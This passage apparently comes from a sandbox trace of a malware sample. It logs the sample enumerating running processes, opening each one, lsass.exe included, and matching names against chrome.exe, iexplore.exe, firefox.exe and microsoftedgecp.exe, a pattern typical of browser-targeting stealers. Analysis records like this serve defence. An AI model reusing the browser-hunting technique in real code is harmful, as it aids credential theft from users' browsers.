	[0238.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.703] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0238.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.703] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.704] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0238.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.704] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.704] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0238.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7e78
	[0238.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.705] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0238.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.705] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.706] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0238.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.706] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0238.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7e7c
	[0238.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.707] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.707] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.707] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.708] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7e80
	[0238.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.709] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.709] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.710] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7e84
	[0238.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.711] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.711] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.711] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.712] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7e88
	[0238.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.714] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.714] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.714] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.714] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7e8c
	[0238.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.716] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.717] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7e90
	[0238.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.718] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.719] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7e94
	[0238.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.720] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7e98
	[0238.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.722] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.723] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0238.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7e9c
	[0238.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.724] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0238.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.724] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.724] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0238.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.725] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7ea0
	[0238.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.727] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0238.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7ea4
	[0238.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.729] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.729] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.730] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.730] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.730] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7ea8
	[0238.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.731] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.732] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.732] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.733] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.733] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7eac
	[0238.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.734] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.735] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.735] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.736] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7eb0
	[0238.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.737] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.738] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.738] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.739] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.739] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0238.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7eb4
	[0238.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.740] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0238.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.740] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.741] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0238.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.741] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.741] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0238.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7eb8
	[0238.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.743] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.744] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.744] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.745] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.745] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0238.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7ebc
	[0238.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.746] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0238.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.747] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.747] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0238.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.748] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.748] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0238.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0238.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0238.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7ec0
	[0238.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.750] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0238.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.751] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.752] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0238.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.753] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0238.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7ec4
	[0238.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.755] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0238.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.755] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.756] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0238.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.756] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0238.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7ec8
	[0238.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.758] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0238.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.758] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.758] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0238.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.759] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0238.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7ecc
	[0238.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.760] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0238.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0238.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0238.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7ed0
	[0238.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.763] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0238.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.763] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.764] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0238.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.765] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0238.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7ed4
	[0238.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.766] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0238.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.766] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
